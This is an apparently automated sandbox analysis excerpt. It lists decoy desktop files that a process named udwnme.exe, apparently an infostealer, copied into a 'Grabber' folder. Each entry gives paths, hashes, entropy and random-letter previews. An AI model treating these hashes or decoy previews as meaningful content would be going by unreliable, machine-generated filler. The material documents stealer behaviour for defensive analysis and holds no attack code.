                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS\RAYHIWGKDI.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS\YPSIACHYXW.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS\ZBEDCJPBEY.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NWTVCDUMOB.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\KATAXZVCPS.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\UMMBDNEQBN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
